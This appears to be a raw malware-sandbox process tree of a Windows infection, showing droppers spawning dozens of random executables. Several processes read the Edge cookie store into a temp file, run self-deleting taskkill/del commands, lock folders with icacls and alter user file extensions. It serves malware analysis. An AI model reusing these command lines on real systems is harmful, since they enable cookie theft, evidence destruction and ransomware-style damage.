PID:5988 -
C:\Users\Admin\Documents\PHgFEn0n4RnF7W9nNSZBw4vt.exe"C:\Users\Admin\Documents\PHgFEn0n4RnF7W9nNSZBw4vt.exe"11⤵
- Executes dropped EXE
PID:6284 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6180
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:8168
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5240
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5160
-
-
-
C:\Users\Admin\Documents\X6ODBpxxZFIYho68uIHt80Ml.exe"C:\Users\Admin\Documents\X6ODBpxxZFIYho68uIHt80Ml.exe"11⤵PID:6276
-
C:\Users\Admin\Documents\X6ODBpxxZFIYho68uIHt80Ml.exeC:\Users\Admin\Documents\X6ODBpxxZFIYho68uIHt80Ml.exe12⤵PID:6684
-
-
-
C:\Users\Admin\Documents\lhHmd78utKBh4mHCibwNzuCC.exe"C:\Users\Admin\Documents\lhHmd78utKBh4mHCibwNzuCC.exe"11⤵
- Executes dropped EXE
PID:6348 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp12⤵PID:6984
-
C:\Windows\SysWOW64\cmd.execmd13⤵PID:6620
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp14⤵PID:6768
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.comAcre.exe.com k14⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:3496 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe15⤵PID:6676
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 3014⤵
- Runs ping.exe
PID:4992
-
-
-
-
-
C:\Users\Admin\Documents\I8cHejqtMA89JGV5R5M7N7Kp.exe"C:\Users\Admin\Documents\I8cHejqtMA89JGV5R5M7N7Kp.exe"11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6452 -
C:\Users\Admin\AppData\Roaming\1234.exeC:\Users\Admin\AppData\Roaming\1234.exe 123412⤵
- Suspicious use of SetThreadContext
PID:7484 -
C:\Users\Admin\AppData\Roaming\1234.exe"{path}"13⤵PID:5752
-
-
-
-
C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe"C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6304 -
C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exeC:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe12⤵
- Loads dropped DLL
- Checks processor information in registry
PID:1036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im dKY998s5SPzWwNMcYpaw6yUY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe" & del C:\ProgramData\*.dll & exit13⤵PID:7188
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dKY998s5SPzWwNMcYpaw6yUY.exe /f14⤵
- Kills process with taskkill
PID:7392
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 614⤵
- Delays execution with timeout.exe
PID:7260
-
-
-
-
C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exeC:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe12⤵PID:4728
-
-
C:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exeC:\Users\Admin\Documents\dKY998s5SPzWwNMcYpaw6yUY.exe12⤵PID:6900
-
-
-
C:\Users\Admin\Documents\w4tIrKVX0vuANbyiyKLpSWZC.exe"C:\Users\Admin\Documents\w4tIrKVX0vuANbyiyKLpSWZC.exe"11⤵
- Suspicious use of SetThreadContext
PID:6524 -
C:\Users\Admin\Documents\w4tIrKVX0vuANbyiyKLpSWZC.exeC:\Users\Admin\Documents\w4tIrKVX0vuANbyiyKLpSWZC.exe12⤵PID:5064
-
-
-
C:\Users\Admin\Documents\hCR0ymhY9oor8Yl3SJ6GmnVf.exe"C:\Users\Admin\Documents\hCR0ymhY9oor8Yl3SJ6GmnVf.exe"11⤵PID:6720
-
C:\Users\Admin\AppData\Roaming\6254666.exe"C:\Users\Admin\AppData\Roaming\6254666.exe"12⤵PID:5996
-
-
-
C:\Users\Admin\Documents\5Dy7hOwiTL8Ak6QWynvwphUL.exe"C:\Users\Admin\Documents\5Dy7hOwiTL8Ak6QWynvwphUL.exe"11⤵
- Suspicious use of SetThreadContext
PID:6856 -
C:\Users\Admin\Documents\5Dy7hOwiTL8Ak6QWynvwphUL.exeC:\Users\Admin\Documents\5Dy7hOwiTL8Ak6QWynvwphUL.exe12⤵PID:5864
-
-
-
C:\Users\Admin\Documents\XyWt2W8MATjVA35URM6tDLgX.exe"C:\Users\Admin\Documents\XyWt2W8MATjVA35URM6tDLgX.exe"11⤵PID:6916
-
C:\Users\Admin\AppData\Roaming\5530608.exe"C:\Users\Admin\AppData\Roaming\5530608.exe"12⤵PID:6608
-
-
C:\Users\Admin\AppData\Roaming\8095701.exe"C:\Users\Admin\AppData\Roaming\8095701.exe"12⤵PID:5052
-
-
-
C:\Users\Admin\Documents\oStteIIySaOnBQ3EkjOI_WM9.exe"C:\Users\Admin\Documents\oStteIIySaOnBQ3EkjOI_WM9.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7024
-
-
C:\Users\Admin\Documents\L_qUXI6RtLVPIQVw95aSnM00.exe"C:\Users\Admin\Documents\L_qUXI6RtLVPIQVw95aSnM00.exe"11⤵PID:7076
-
C:\Users\Admin\Documents\L_qUXI6RtLVPIQVw95aSnM00.exe"C:\Users\Admin\Documents\L_qUXI6RtLVPIQVw95aSnM00.exe"12⤵
- Modifies data under HKEY_USERS
PID:7652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 84412⤵
- Program crash
PID:6360
-
-
-
C:\Users\Admin\Documents\KaN4oxVdNgcWXHg7_Sl3FY8D.exe"C:\Users\Admin\Documents\KaN4oxVdNgcWXHg7_Sl3FY8D.exe"11⤵
- Loads dropped DLL
- Checks processor information in registry
PID:7132 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im KaN4oxVdNgcWXHg7_Sl3FY8D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\KaN4oxVdNgcWXHg7_Sl3FY8D.exe" & del C:\ProgramData\*.dll & exit12⤵PID:7240
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im KaN4oxVdNgcWXHg7_Sl3FY8D.exe /f13⤵
- Kills process with taskkill
PID:7400
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 613⤵
- Delays execution with timeout.exe
PID:7960
-
-
-
-
C:\Users\Admin\Documents\bk4qYn6iqEu8EcFaNEfbK8xa.exe"C:\Users\Admin\Documents\bk4qYn6iqEu8EcFaNEfbK8xa.exe"11⤵PID:7160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 67612⤵
- Suspicious use of SetThreadContext
- Program crash
PID:6964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 72812⤵
- Program crash
PID:6008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 70412⤵
- Program crash
PID:3956
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 145612⤵
- Program crash
PID:6532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 144812⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5708
-
-
-
C:\Users\Admin\Documents\B6WBh3mhuunwV2q6nswNBqnx.exe"C:\Users\Admin\Documents\B6WBh3mhuunwV2q6nswNBqnx.exe"11⤵PID:5204
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"12⤵PID:5352
-
C:\Users\Admin\AppData\Local\Temp\7zS8E46ED94\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8E46ED94\setup_install.exe"13⤵
- Loads dropped DLL
PID:6572 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c karotima_2.exe14⤵PID:4500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c karotima_1.exe14⤵PID:4108
-
-
-
-
-
C:\Users\Admin\Documents\2YmVmtTLWyb91Qe2CZ7Y8yVY.exe"C:\Users\Admin\Documents\2YmVmtTLWyb91Qe2CZ7Y8yVY.exe"11⤵
- Suspicious use of SetThreadContext
PID:6520 -
C:\Users\Admin\Documents\2YmVmtTLWyb91Qe2CZ7Y8yVY.exeC:\Users\Admin\Documents\2YmVmtTLWyb91Qe2CZ7Y8yVY.exe12⤵PID:5624
-
-
-
C:\Users\Admin\Documents\sH3EbgK9T6oeicNB0HXuc4vb.exe"C:\Users\Admin\Documents\sH3EbgK9T6oeicNB0HXuc4vb.exe"11⤵
- Checks whether UAC is enabled
PID:6972
-
-
C:\Users\Admin\Documents\G7KL3ndeDTZG8mbAHlWj4qkn.exe"C:\Users\Admin\Documents\G7KL3ndeDTZG8mbAHlWj4qkn.exe"11⤵PID:6964
-
C:\Users\Admin\Documents\G7KL3ndeDTZG8mbAHlWj4qkn.exeC:\Users\Admin\Documents\G7KL3ndeDTZG8mbAHlWj4qkn.exe12⤵PID:5460
-
-
C:\Users\Admin\Documents\G7KL3ndeDTZG8mbAHlWj4qkn.exeC:\Users\Admin\Documents\G7KL3ndeDTZG8mbAHlWj4qkn.exe12⤵PID:6652
-
-
-
C:\Users\Admin\Documents\31wkwAtjI8KkaEGctVblKMRv.exe"C:\Users\Admin\Documents\31wkwAtjI8KkaEGctVblKMRv.exe"11⤵PID:6728
-
C:\Users\Admin\Documents\31wkwAtjI8KkaEGctVblKMRv.exe"C:\Users\Admin\Documents\31wkwAtjI8KkaEGctVblKMRv.exe" -a12⤵PID:5916
-
-
-
C:\Users\Admin\Documents\xqt8qLLHxSBbiug4VkrmvTGt.exe"C:\Users\Admin\Documents\xqt8qLLHxSBbiug4VkrmvTGt.exe"11⤵
- Drops file in Program Files directory
PID:6056
-
-
C:\Users\Admin\Documents\jxRhkXsx2LCqJ11KLYQ57gus.exe"C:\Users\Admin\Documents\jxRhkXsx2LCqJ11KLYQ57gus.exe"11⤵
- Suspicious use of SetThreadContext
PID:5224 -
C:\Users\Admin\Documents\jxRhkXsx2LCqJ11KLYQ57gus.exe"C:\Users\Admin\Documents\jxRhkXsx2LCqJ11KLYQ57gus.exe"12⤵PID:2404
-
-
-
-
-
-
-
-
C:\Users\Admin\Documents\XC7GFZbOyXvcLg6m3jXQe4az.exe"C:\Users\Admin\Documents\XC7GFZbOyXvcLg6m3jXQe4az.exe"6⤵
- Executes dropped EXE
PID:5372 -
C:\Users\Admin\Documents\XC7GFZbOyXvcLg6m3jXQe4az.exe"C:\Users\Admin\Documents\XC7GFZbOyXvcLg6m3jXQe4az.exe" -a7⤵
- Executes dropped EXE
PID:5648
-
-
-
C:\Users\Admin\Documents\u23UoDWXrdQ41Fgmp4uqBhEf.exe"C:\Users\Admin\Documents\u23UoDWXrdQ41Fgmp4uqBhEf.exe"6⤵
- Executes dropped EXE
PID:5556 -
C:\Users\Admin\AppData\Roaming\5465436.exe"C:\Users\Admin\AppData\Roaming\5465436.exe"7⤵
- Executes dropped EXE
PID:4464
-
-
-
C:\Users\Admin\Documents\NIAOGBzy_hFz9YCFo91sc8Cw.exe"C:\Users\Admin\Documents\NIAOGBzy_hFz9YCFo91sc8Cw.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5820 -
C:\Users\Admin\Documents\NIAOGBzy_hFz9YCFo91sc8Cw.exeC:\Users\Admin\Documents\NIAOGBzy_hFz9YCFo91sc8Cw.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6276
-
-
-
C:\Users\Admin\Documents\6UnP7EhagycDLPoMKxBtGRuQ.exe"C:\Users\Admin\Documents\6UnP7EhagycDLPoMKxBtGRuQ.exe"6⤵
- Executes dropped EXE
PID:5136 -
C:\Users\Admin\AppData\Roaming\8397034.exe"C:\Users\Admin\AppData\Roaming\8397034.exe"7⤵
- Executes dropped EXE
PID:6320
-
-
C:\Users\Admin\AppData\Roaming\3380837.exe"C:\Users\Admin\AppData\Roaming\3380837.exe"7⤵
- Executes dropped EXE
PID:6336
-
-
-
C:\Users\Admin\Documents\bKfpc48xGw3Dw3RG2dKu5Vwk.exe"C:\Users\Admin\Documents\bKfpc48xGw3Dw3RG2dKu5Vwk.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5960 -
C:\Users\Admin\Documents\bKfpc48xGw3Dw3RG2dKu5Vwk.exeC:\Users\Admin\Documents\bKfpc48xGw3Dw3RG2dKu5Vwk.exe7⤵PID:6216
-
-
-
C:\Users\Admin\Documents\szCedVVBNBra28ARc2qYEf08.exe"C:\Users\Admin\Documents\szCedVVBNBra28ARc2qYEf08.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6104
-
-
C:\Users\Admin\Documents\U_4UFn8WiO3eu26sOYob2_Fx.exe"C:\Users\Admin\Documents\U_4UFn8WiO3eu26sOYob2_Fx.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4476
-
-
C:\Users\Admin\Documents\FSmhlU6Of5LeBRyI0j9T6fgM.exe"C:\Users\Admin\Documents\FSmhlU6Of5LeBRyI0j9T6fgM.exe"6⤵
- Executes dropped EXE
PID:6188 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 6607⤵
- Program crash
PID:4724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 6807⤵
- Program crash
PID:6184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 10367⤵
- Program crash
PID:7012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 12407⤵
- Program crash
PID:804
-
-
-
C:\Users\Admin\Documents\bZzVstBGF42ordOVpwbQAw5J.exe"C:\Users\Admin\Documents\bZzVstBGF42ordOVpwbQAw5J.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6232 -
C:\Users\Admin\Documents\bZzVstBGF42ordOVpwbQAw5J.exeC:\Users\Admin\Documents\bZzVstBGF42ordOVpwbQAw5J.exe7⤵PID:7148
-
-
-
C:\Users\Admin\Documents\pADyznAja7hNAcn0P3Ium4B3.exe"C:\Users\Admin\Documents\pADyznAja7hNAcn0P3Ium4B3.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:6196 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im pADyznAja7hNAcn0P3Ium4B3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\pADyznAja7hNAcn0P3Ium4B3.exe" & del C:\ProgramData\*.dll & exit7⤵PID:7712
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im pADyznAja7hNAcn0P3Ium4B3.exe /f8⤵
- Kills process with taskkill
PID:8060
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:7460
-
-
-
-
C:\Users\Admin\Documents\ies6fl_0TmfCmYRE5wqrEm57.exe"C:\Users\Admin\Documents\ies6fl_0TmfCmYRE5wqrEm57.exe"6⤵PID:6180
-
C:\Users\Admin\Documents\ies6fl_0TmfCmYRE5wqrEm57.exe"C:\Users\Admin\Documents\ies6fl_0TmfCmYRE5wqrEm57.exe"7⤵
- Checks processor information in registry
PID:6312
-
-
-
C:\Users\Admin\Documents\0IzhjBLGzhfJ1lBcluP4OBHg.exe"C:\Users\Admin\Documents\0IzhjBLGzhfJ1lBcluP4OBHg.exe"6⤵PID:6712
-
C:\Users\Admin\Documents\0IzhjBLGzhfJ1lBcluP4OBHg.exe"C:\Users\Admin\Documents\0IzhjBLGzhfJ1lBcluP4OBHg.exe"7⤵
- Modifies data under HKEY_USERS
PID:4840
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_6.exesonia_6.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:4444
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:5060
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:7240
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:6072
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_7.exe4⤵PID:1172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_4.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_1.exe4⤵PID:3568
-
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:996
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_1.exesonia_1.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_1.exe"C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_1.exe" -a2⤵PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_4.exesonia_4.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵PID:3660
-
C:\Users\Admin\AppData\Local\Temp\setup 326.exe"C:\Users\Admin\AppData\Local\Temp\setup 326.exe"3⤵PID:4284
-
C:\Windows\winnetdriv.exe"C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626775097 04⤵
- Executes dropped EXE
PID:4584
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
PID:4368 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 6804⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 8404⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 9684⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 10604⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 10764⤵
- Program crash
PID:4272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 9124⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
-
C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exeC:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵
- Executes dropped EXE
PID:4120 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:4756
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:4676
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7444
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6112
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"3⤵
- Executes dropped EXE
PID:4812 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4812 -s 10164⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhangd.exe"C:\Users\Admin\AppData\Local\Temp\zhangd.exe"3⤵
- Executes dropped EXE
PID:4604
-
-
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵PID:3860
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:1684
-
C:\Users\Admin\AppData\Local\Temp\zhangd.exe"C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a1⤵
- Executes dropped EXE
PID:5104
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4284
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5156
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:5244
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:6056 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:6076
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5576
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:6048
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b01aa707fa2344c8b3c74dfc30b739c3 /t 5240 /p 60481⤵PID:6664
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6736
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:4460 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:6528
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3896
-
C:\Users\Admin\AppData\Local\Temp\9E06.exeC:\Users\Admin\AppData\Local\Temp\9E06.exe1⤵
- Suspicious use of SetThreadContext
PID:7576 -
C:\Users\Admin\AppData\Local\Temp\9E06.exeC:\Users\Admin\AppData\Local\Temp\9E06.exe2⤵
- Adds Run key to start application
PID:6156 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:5904
-
-
C:\Users\Admin\AppData\Local\Temp\9E06.exe"C:\Users\Admin\AppData\Local\Temp\9E06.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
PID:6092 -
C:\Users\Admin\AppData\Local\Temp\9E06.exe"C:\Users\Admin\AppData\Local\Temp\9E06.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
- Loads dropped DLL
PID:6076 -
C:\Users\Admin\AppData\Local\670088e6-b778-4e42-b9a6-36ef49d82395\build2.exe"C:\Users\Admin\AppData\Local\670088e6-b778-4e42-b9a6-36ef49d82395\build2.exe"5⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:4284 -
